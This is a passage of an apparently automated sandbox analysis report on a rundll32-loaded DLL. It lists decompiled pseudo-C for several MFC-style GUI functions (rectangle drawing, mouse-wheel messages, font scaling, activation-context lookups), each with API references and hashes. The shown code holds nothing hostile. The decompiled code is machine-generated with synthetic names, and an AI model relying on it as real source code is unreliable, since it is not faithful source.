                                                                                                        • GetMessageA.USER32 ref: 1002E3B1
                                                                                                        • GetCapture.USER32 ref: 1002E3B7
                                                                                                        • ReleaseDC.USER32 ref: 1002E41E
                                                                                                        • ReleaseCapture.USER32 ref: 1002E424
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Capture$ReleaseUpdateWindow$Message
                                                                                                        • String ID:
                                                                                                        • API String ID: 2454456769-0
                                                                                                        • Opcode ID: cebc1c3416efb2c5bc40518e0a84564a25f72bff54c558533b41f7e530cffb30
                                                                                                        • Instruction ID: dc39ec279f3e44a309d8a0762089c75dbcd4d86acfb3125876833c5cfee86e69
                                                                                                        • Opcode Fuzzy Hash: cebc1c3416efb2c5bc40518e0a84564a25f72bff54c558533b41f7e530cffb30
                                                                                                        • Instruction Fuzzy Hash: EB915A71900269EFCF11CFA4D9888AEBBBAFF08341B504169F905AB224D731EE50DF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 98%
                                                                                                        			E1002180B(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				void* _t135;
                                                                                                        				intOrPtr _t194;
                                                                                                        				intOrPtr* _t228;
                                                                                                        				void* _t230;
                                                                                                        				intOrPtr _t233;
                                                                                                        
                                                                                                        				_push(0x38);
                                                                                                        				E1003EE82(0x10054e70, __ebx, __edi, __esi);
                                                                                                        				_t228 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t230 - 0x30)) = 0;
                                                                                                        				 *((intOrPtr*)(_t230 - 0x34)) = 0x1005c400;
                                                                                                        				 *(_t230 - 4) = 0;
                                                                                                        				 *((intOrPtr*)(_t230 - 0x28)) = 0;
                                                                                                        				 *((intOrPtr*)(_t230 - 0x2c)) = 0x1005c400;
                                                                                                        				 *((intOrPtr*)(_t230 - 0x20)) = 0;
                                                                                                        				 *((intOrPtr*)(_t230 - 0x24)) = 0x1005c400;
                                                                                                        				 *(_t230 - 4) = 2;
                                                                                                        				E1002165F(_t230 - 0x2c,  *(_t230 + 8));
                                                                                                        				CopyRect(_t230 - 0x44,  *(_t230 + 8));
                                                                                                        				InflateRect(_t230 - 0x44,  ~( *(_t230 + 0xc)),  ~( *(_t230 + 0x10)));
                                                                                                        				IntersectRect(_t230 - 0x44, _t230 - 0x44,  *(_t230 + 8));
                                                                                                        				E10009236(_t230 - 0x24, 0x1005c400, _t230, CreateRectRgnIndirect(_t230 - 0x44));
                                                                                                        				E10009236(_t230 - 0x34, 0x1005c400, _t230, CreateRectRgn(0, 0, 0, 0));
                                                                                                        				E10021693(_t230 - 0x34, _t230 - 0x2c, _t230 - 0x24, 3);
                                                                                                        				_t232 =  *((intOrPtr*)(_t230 + 0x20));
                                                                                                        				if( *((intOrPtr*)(_t230 + 0x20)) == 0) {
                                                                                                        					 *((intOrPtr*)(_t230 + 0x20)) = E10021768(0, 0x1005c400, _t228, _t232);
                                                                                                        				}
                                                                                                        				_t194 =  *((intOrPtr*)(_t230 + 0x20));
                                                                                                        				_t233 = _t194;
                                                                                                        				_t234 = _t233 == 0;
                                                                                                        				if(_t233 == 0) {
                                                                                                        					E1000836F(0, _t194, 0x1005c400, _t228, _t234);
                                                                                                        				}
                                                                                                        				if( *((intOrPtr*)(_t230 + 0x24)) == 0) {
                                                                                                        					 *((intOrPtr*)(_t230 + 0x24)) = _t194;
                                                                                                        				}
                                                                                                        				 *((intOrPtr*)(_t230 - 0x18)) = 0;
                                                                                                        				 *((intOrPtr*)(_t230 - 0x1c)) = 0x1005c400;
                                                                                                        				 *((intOrPtr*)(_t230 - 0x10)) = 0;
                                                                                                        				 *((intOrPtr*)(_t230 - 0x14)) = 0x1005c400;
                                                                                                        				 *(_t230 - 4) = 4;
                                                                                                        				if( *(_t230 + 0x14) != 0) {
                                                                                                        					E10009236(_t230 - 0x1c, CreateRectRgn, _t230, CreateRectRgn(0, 0, 0, 0));
                                                                                                        					E10021678(_t230 - 0x2c,  *(_t230 + 0x14));
                                                                                                        					CopyRect(_t230 - 0x44,  *(_t230 + 0x14));
                                                                                                        					InflateRect(_t230 - 0x44,  ~( *(_t230 + 0x18)),  ~( *(_t230 + 0x1c)));
                                                                                                        					IntersectRect(_t230 - 0x44, _t230 - 0x44,  *(_t230 + 0x14));
                                                                                                        					E10021678(_t230 - 0x24, _t230 - 0x44);
                                                                                                        					E10021693(_t230 - 0x1c, _t230 - 0x2c, _t230 - 0x24, 3);
                                                                                                        					if( *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x24)) + 4))) {
                                                                                                        						E10009236(_t230 - 0x14, CreateRectRgn, _t230, CreateRectRgn(0, 0, 0, 0));
                                                                                                        						E10021693(_t230 - 0x14, _t230 - 0x1c, _t230 - 0x34, 3);
                                                                                                        					}
                                                                                                        				}
                                                                                                        				if( *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x24)) + 4)) &&  *(_t230 + 0x14) != 0) {
                                                                                                        					E10008C96(_t228, _t230 - 0x1c);
                                                                                                        					 *((intOrPtr*)( *_t228 + 0x50))(_t230 - 0x44);
                                                                                                        					 *(_t230 + 0x14) = E10009357(_t228,  *((intOrPtr*)(_t230 + 0x24)));
                                                                                                        					PatBlt( *(_t228 + 4),  *(_t230 - 0x44),  *(_t230 - 0x40),  *((intOrPtr*)(_t230 - 0x3c)) -  *(_t230 - 0x44),  *((intOrPtr*)(_t230 - 0x38)) -  *(_t230 - 0x40), 0x5a0049);
                                                                                                        					E10009357(_t228,  *(_t230 + 0x14));
                                                                                                        				}
                                                                                                        				_t135 = _t230 - 0x14;
                                                                                                        				if( *((intOrPtr*)(_t230 - 0x10)) == 0) {
                                                                                                        					_t135 = _t230 - 0x34;
                                                                                                        				}
                                                                                                        				E10008C96(_t228, _t135);
                                                                                                        				 *((intOrPtr*)( *_t228 + 0x50))(_t230 - 0x44);
                                                                                                        				 *(_t230 + 0x14) = E10009357(_t228,  *((intOrPtr*)(_t230 + 0x20)));
                                                                                                        				PatBlt( *(_t228 + 4),  *(_t230 - 0x44),  *(_t230 - 0x40),  *((intOrPtr*)(_t230 - 0x3c)) -  *(_t230 - 0x44),  *((intOrPtr*)(_t230 - 0x38)) -  *(_t230 - 0x40), 0x5a0049);
                                                                                                        				if( *(_t230 + 0x14) != 0) {
                                                                                                        					E10009357(_t228,  *(_t230 + 0x14));
                                                                                                        				}
                                                                                                        				E10008C96(_t228, 0);
                                                                                                        				 *(_t230 - 4) = 3;
                                                                                                        				 *((intOrPtr*)(_t230 - 0x14)) = 0x10058e64;
                                                                                                        				E10009289(_t230 - 0x14);
                                                                                                        				 *(_t230 - 4) = 2;
                                                                                                        				 *((intOrPtr*)(_t230 - 0x1c)) = 0x10058e64;
                                                                                                        				E10009289(_t230 - 0x1c);
                                                                                                        				 *(_t230 - 4) = 1;
                                                                                                        				 *((intOrPtr*)(_t230 - 0x24)) = 0x10058e64;
                                                                                                        				E10009289(_t230 - 0x24);
                                                                                                        				 *(_t230 - 4) = 0;
                                                                                                        				 *((intOrPtr*)(_t230 - 0x2c)) = 0x10058e64;
                                                                                                        				E10009289(_t230 - 0x2c);
                                                                                                        				 *(_t230 - 4) =  *(_t230 - 4) | 0xffffffff;
                                                                                                        				 *((intOrPtr*)(_t230 - 0x34)) = 0x10058e64;
                                                                                                        				return E1003EF21(E10009289(_t230 - 0x34));
                                                                                                        			}









                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 10021812
                                                                                                          • Part of subcall function 1002165F: CreateRectRgnIndirect.GDI32(?), ref: 10021666
                                                                                                        • CopyRect.USER32 ref: 1002184B
                                                                                                        • InflateRect.USER32(?,?,?), ref: 10021861
                                                                                                        • IntersectRect.USER32 ref: 1002186F
                                                                                                        • CreateRectRgnIndirect.GDI32(?), ref: 10021879
                                                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1002188C
                                                                                                          • Part of subcall function 10021693: CombineRgn.GDI32(?,?,00000002,?), ref: 100216B6
                                                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 100218F8
                                                                                                        • CopyRect.USER32 ref: 10021915
                                                                                                        • InflateRect.USER32(?,?,?), ref: 1002192B
                                                                                                        • IntersectRect.USER32 ref: 10021939
                                                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1002196F
                                                                                                          • Part of subcall function 10021768: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 100217AE
                                                                                                          • Part of subcall function 10021768: CreatePatternBrush.GDI32(00000000), ref: 100217BB
                                                                                                          • Part of subcall function 10021768: DeleteObject.GDI32(00000000), ref: 100217C7
                                                                                                        • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 100219E4
                                                                                                          • Part of subcall function 10009357: SelectObject.GDI32(?,00000000), ref: 10009379
                                                                                                          • Part of subcall function 10009357: SelectObject.GDI32(?,?), ref: 1000938F
                                                                                                        • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 10021A37
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prolog3Pattern
                                                                                                        • String ID:
                                                                                                        • API String ID: 3342639795-0
                                                                                                        • Opcode ID: 27878363cce4e4d802bc57ad59692b235be21c872cc19aa691137ed429ca5c10
                                                                                                        • Instruction ID: 8f3ab7ecab5f51aaf2319344c9cbb7601b2c59b21e49a1fee434560ae7685461
                                                                                                        • Opcode Fuzzy Hash: 27878363cce4e4d802bc57ad59692b235be21c872cc19aa691137ed429ca5c10
                                                                                                        • Instruction Fuzzy Hash: E29111B990010DAFDF01DFA4CA958EEBBB9FF18244B50411AF906B3291DB34AE05CB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10032282(void* __ecx, intOrPtr* _a4, int* _a8, int* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                        				struct HWND__* _v8;
                                                                                                        				int _t14;
                                                                                                        				int _t15;
                                                                                                        				int _t16;
                                                                                                        				int* _t22;
                                                                                                        				int _t23;
                                                                                                        				int* _t31;
                                                                                                        				int _t32;
                                                                                                        
                                                                                                        				_v8 = FindWindowA("MouseZ", "Magellan MSWHEEL");
                                                                                                        				 *_a4 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
                                                                                                        				_t14 = RegisterWindowMessageA("MSH_WHEELSUPPORT_MSG");
                                                                                                        				_t31 = _a8;
                                                                                                        				 *_t31 = _t14;
                                                                                                        				_t15 = RegisterWindowMessageA("MSH_SCROLL_LINES_MSG");
                                                                                                        				_t22 = _a12;
                                                                                                        				 *_t22 = _t15;
                                                                                                        				_t32 =  *_t31;
                                                                                                        				_t16 = 0;
                                                                                                        				if(_t32 == 0) {
                                                                                                        					 *_a16 = 0;
                                                                                                        				} else {
                                                                                                        					 *_a16 = SendMessageA(_v8, _t32, 0, 0);
                                                                                                        					_t16 = 0;
                                                                                                        				}
                                                                                                        				_t23 =  *_t22;
                                                                                                        				if(_t23 == _t16) {
                                                                                                        					 *_a20 = 3;
                                                                                                        				} else {
                                                                                                        					 *_a20 = SendMessageA(_v8, _t23, _t16, _t16);
                                                                                                        				}
                                                                                                        				return _v8;
                                                                                                        			}












                                                                                                        APIs
                                                                                                        • FindWindowA.USER32 ref: 10032293
                                                                                                        • RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 100322A7
                                                                                                        • RegisterWindowMessageA.USER32(MSH_WHEELSUPPORT_MSG), ref: 100322B3
                                                                                                        • RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG), ref: 100322BF
                                                                                                        • SendMessageA.USER32 ref: 100322DA
                                                                                                        • SendMessageA.USER32 ref: 100322F6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$Window$Register$Send$Find
                                                                                                        • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                                        • API String ID: 3569030445-3736581797
                                                                                                        • Opcode ID: 5c65d925ded3aea0597b9de184b93df891d44074dd8624c01524511124f35b40
                                                                                                        • Instruction ID: 7eb448f67160629c0821becfe2f35b715441f62429a965571e3e6846dc91c331
                                                                                                        • Opcode Fuzzy Hash: 5c65d925ded3aea0597b9de184b93df891d44074dd8624c01524511124f35b40
                                                                                                        • Instruction Fuzzy Hash: A711F7B5A10219FFDB05CF64CC889AE3BF9EB49394B114465E901EB350D771AE10DFA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 90%
                                                                                                        			E1001F340(void* __ebx, void* __ecx, void* __edx, int _a4) {
                                                                                                        				signed int _v8;
                                                                                                        				struct tagLOGFONTA _v68;
                                                                                                        				char _v100;
                                                                                                        				void _v128;
                                                                                                        				int _v132;
                                                                                                        				struct HDC__* _v136;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t29;
                                                                                                        				struct HDC__* _t40;
                                                                                                        				int _t41;
                                                                                                        				void* _t50;
                                                                                                        				void* _t62;
                                                                                                        				void* _t63;
                                                                                                        				signed int _t65;
                                                                                                        
                                                                                                        				_t62 = __edx;
                                                                                                        				_t54 = __ecx;
                                                                                                        				_t50 = __ebx;
                                                                                                        				_t29 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_v8 = _t29 ^ _t65;
                                                                                                        				_t64 = _a4;
                                                                                                        				_t63 = __ecx;
                                                                                                        				_t66 = __ecx;
                                                                                                        				_v132 = _t64;
                                                                                                        				if(__ecx != 0) {
                                                                                                        					L2:
                                                                                                        					if(_t64 == 0) {
                                                                                                        						goto L1;
                                                                                                        					}
                                                                                                        					_t32 = E10038EAD(_t50, _t63 + 0x6c, _t65,  *((intOrPtr*)(_t63 + 0x74)), 0);
                                                                                                        					if( *(_t63 + 0x80) == 0) {
                                                                                                        						_t32 = E100044D0(_t63);
                                                                                                        						if(_t32 != 0) {
                                                                                                        							_push(_t50);
                                                                                                        							GetObjectA( *(_t32 + 4), 0x3c,  &_v68);
                                                                                                        							GetObjectA(GetStockObject(0xd), 0x3c,  &_v128);
                                                                                                        							if(E1000D035( &(_v68.lfFaceName),  &_v100) != 0) {
                                                                                                        								_t40 = GetDC(0);
                                                                                                        								_t64 = GetDeviceCaps;
                                                                                                        								_v136 = _t40;
                                                                                                        								_t41 = GetDeviceCaps( *0x00000008, 0x5a);
                                                                                                        								_v68.lfHeight = MulDiv(_v68, _t41, GetDeviceCaps(_v136, 0x5a));
                                                                                                        								_v132 = GetDeviceCaps( *(_v132 + 8), 0x58);
                                                                                                        								_v68.lfWidth = MulDiv(_v68.lfWidth, _v132, GetDeviceCaps(_v136, 0x58));
                                                                                                        								ReleaseDC(0, _v136);
                                                                                                        								_t32 = CreateFontIndirectA( &_v68);
                                                                                                        								 *(_t63 + 0x84) = _t32;
                                                                                                        								 *(_t63 + 0x80) = _t32;
                                                                                                        							}
                                                                                                        							_pop(_t50);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					return E10039F21(_t32, _t50, _v8 ^ _t65, _t62, _t63, _t64);
                                                                                                        				}
                                                                                                        				L1:
                                                                                                        				E1000836F(_t50, _t54, _t63, _t64, _t66);
                                                                                                        				goto L2;
                                                                                                        			}




















                                                                                                        APIs
                                                                                                        • GetObjectA.GDI32(?,0000003C,?), ref: 1001F3A3
                                                                                                        • GetStockObject.GDI32(0000000D), ref: 1001F3AD
                                                                                                        • GetObjectA.GDI32(00000000,?,?), ref: 1001F3B4
                                                                                                        • GetDC.USER32(00000000), ref: 1001F3CB
                                                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 1001F3E2
                                                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 1001F3EE
                                                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 1001F3FB
                                                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 1001F408
                                                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 1001F415
                                                                                                        • MulDiv.KERNEL32(?,?,00000000), ref: 1001F41E
                                                                                                        • ReleaseDC.USER32 ref: 1001F42B
                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 1001F435
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsDevice$Object$CreateException@8FontH_prolog3IndirectReleaseStockThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 642654325-0
                                                                                                        • Opcode ID: 69697762f98c175853476738a19d6b9283dcd3d0d62039b7e5ce766fabcfb69e
                                                                                                        • Instruction ID: e4e84310eb1f7f673988f6b2a4b92a94e364b014863b64c70e208f28a7001c3c
                                                                                                        • Opcode Fuzzy Hash: 69697762f98c175853476738a19d6b9283dcd3d0d62039b7e5ce766fabcfb69e
                                                                                                        • Instruction Fuzzy Hash: 15315E75A00219AFEB11DBA4CC85BAEBBB8FF18751F00411AEA44E61A0DB30AA01DF50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1002644F(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __ebp;
                                                                                                        				_Unknown_base(*)()* _t9;
                                                                                                        				struct HINSTANCE__* _t15;
                                                                                                        				void* _t16;
                                                                                                        				intOrPtr* _t18;
                                                                                                        				char _t19;
                                                                                                        				intOrPtr _t21;
                                                                                                        				_Unknown_base(*)()* _t22;
                                                                                                        				_Unknown_base(*)()* _t23;
                                                                                                        
                                                                                                        				_t16 = __esi;
                                                                                                        				_t12 = __ecx;
                                                                                                        				_t18 = __ecx;
                                                                                                        				 *__ecx = _a4;
                                                                                                        				_a4 = 0;
                                                                                                        				_t19 =  *0x10098ed4; // 0x0
                                                                                                        				if(_t19 == 0) {
                                                                                                        					_t15 = GetModuleHandleA("KERNEL32");
                                                                                                        					_t20 = _t15;
                                                                                                        					if(_t15 == 0) {
                                                                                                        						L2:
                                                                                                        						E1000836F(0, _t12, _t15, _t16, _t20);
                                                                                                        					}
                                                                                                        					 *0x10098ec4 = GetProcAddress(_t15, "CreateActCtxA");
                                                                                                        					 *0x10098ec8 = GetProcAddress(_t15, "ReleaseActCtx");
                                                                                                        					 *0x10098ecc = GetProcAddress(_t15, "ActivateActCtx");
                                                                                                        					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
                                                                                                        					_t21 =  *0x10098ec4; // 0x0
                                                                                                        					 *0x10098ed0 = _t9;
                                                                                                        					_t16 = _t16;
                                                                                                        					if(_t21 == 0) {
                                                                                                        						__eflags =  *0x10098ec8; // 0x0
                                                                                                        						if(__eflags != 0) {
                                                                                                        							goto L2;
                                                                                                        						} else {
                                                                                                        							__eflags =  *0x10098ecc; // 0x0
                                                                                                        							if(__eflags != 0) {
                                                                                                        								goto L2;
                                                                                                        							} else {
                                                                                                        								__eflags = _t9;
                                                                                                        								if(__eflags != 0) {
                                                                                                        									goto L2;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_t22 =  *0x10098ec8; // 0x0
                                                                                                        						if(_t22 == 0) {
                                                                                                        							goto L2;
                                                                                                        						} else {
                                                                                                        							_t23 =  *0x10098ecc; // 0x0
                                                                                                        							if(_t23 == 0) {
                                                                                                        								goto L2;
                                                                                                        							} else {
                                                                                                        								_t20 = _t9;
                                                                                                        								if(_t9 == 0) {
                                                                                                        									goto L2;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					 *0x10098ed4 = 1;
                                                                                                        				}
                                                                                                        				return _t18;
                                                                                                        			}















                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,10027076,000000FF), ref: 10026471
                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 1002648F
                                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 1002649C
                                                                                                        • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 100264A9
                                                                                                        • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 100264B6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                        • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                        • API String ID: 667068680-3617302793
                                                                                                        • Opcode ID: 4dae66e16ba0676ad529ecfcd43bcb397ead7d5ee40f0915e13f88ec5a049278
                                                                                                        • Instruction ID: e9cc3cf0067e69ee31c57108128d06749ce3ac726ccf510888d85e77703269a3
                                                                                                        • Opcode Fuzzy Hash: 4dae66e16ba0676ad529ecfcd43bcb397ead7d5ee40f0915e13f88ec5a049278
                                                                                                        • Instruction Fuzzy Hash: 1D11C471C11276EFE745EF65ACD444ABAE8F749A44741403FE2C8822A0D7B04B44CF11
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 88%
                                                                                                        			E1001F120(void* __ecx, intOrPtr _a4, int _a8) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				long _t17;
                                                                                                        				void* _t19;
                                                                                                        				void* _t20;
                                                                                                        				void* _t27;
                                                                                                        				int _t37;
                                                                                                        				void* _t45;
                                                                                                        
                                                                                                        				_t37 = _a8;
                                                                                                        				_t45 = __ecx;
                                                                                                        				_t17 = E10001FC0(_t37 + 1, 1);
                                                                                                        				_pop(_t40);
                                                                                                        				_t44 = LocalAlloc(2, _t17);
                                                                                                        				_t46 = _t44;
                                                                                                        				if(_t44 != 0) {
                                                                                                        					L2:
                                                                                                        					_t19 = LocalLock(_t44);
                                                                                                        					_t40 = _a4;
                                                                                                        					_a8 = _t19;
                                                                                                        					_t20 = E10021BE0(_a4, _t44, _t19, _t37);
                                                                                                        					_t47 = _t20 - _t37;
                                                                                                        					if(_t20 != _t37) {
                                                                                                        						LocalUnlock(_t44);
                                                                                                        						LocalFree(_t44);
                                                                                                        						_push(0);
                                                                                                        						_push(3);
                                                                                                        						E10029BF0(_t37, _t44, _t45, _t47);
                                                                                                        					}
                                                                                                        					 *((char*)(_a8 + _t37)) = 0;
                                                                                                        					if( *0x10099164 != 0 || E10012BAD(_t40, _t44) == 0x60000) {
                                                                                                        						_a8 = SetWindowTextA( *(_t45 + 0x20), _a8);
                                                                                                        						LocalUnlock(_t44);
                                                                                                        						LocalFree(_t44);
                                                                                                        						_t44 = 0;
                                                                                                        						__eflags = _a8;
                                                                                                        						if(__eflags == 0) {
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        						__eflags = GetWindowTextLengthA( *(_t45 + 0x20)) - _t37;
                                                                                                        						if(__eflags < 0) {
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        						_push( *((intOrPtr*)(_t45 + 0x64)));
                                                                                                        						_t27 = E10007788(_t37, 0, _t45, __eflags);
                                                                                                        						 *((intOrPtr*)(_t45 + 0x64)) = 0;
                                                                                                        						 *((intOrPtr*)(_t45 + 0x68)) = 0;
                                                                                                        						return _t27;
                                                                                                        					} else {
                                                                                                        						LocalUnlock(_t44);
                                                                                                        						LocalFree(E1001F02D(_t45));
                                                                                                        						E1001F040(_t45, _t44);
                                                                                                        						return InvalidateRect( *(_t45 + 0x20), 0, 1);
                                                                                                        					}
                                                                                                        				}
                                                                                                        				L1:
                                                                                                        				E1000833B(_t37, _t40, _t44, _t45, _t46);
                                                                                                        				goto L2;
                                                                                                        			}














                                                                                                        APIs
                                                                                                        • LocalAlloc.KERNEL32(00000002,00000000), ref: 1001F13B
                                                                                                        • LocalLock.KERNEL32(00000000), ref: 1001F14D
                                                                                                        • LocalUnlock.KERNEL32(00000000,00000000,?), ref: 1001F165
                                                                                                        • LocalFree.KERNEL32(00000000), ref: 1001F16C
                                                                                                        • LocalUnlock.KERNEL32(00000000,00000000,?), ref: 1001F198
                                                                                                        • LocalFree.KERNEL32(00000000), ref: 1001F1A6
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,00000000), ref: 1001F1BB
                                                                                                          • Part of subcall function 1000833B: __CxxThrowException@8.LIBCMT ref: 1000834F
                                                                                                        • SetWindowTextA.USER32(?,?), ref: 1001F1C9
                                                                                                        • LocalUnlock.KERNEL32(00000000), ref: 1001F1D3
                                                                                                        • LocalFree.KERNEL32(00000000), ref: 1001F1DA
                                                                                                        • GetWindowTextLengthA.USER32(?), ref: 1001F1EE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
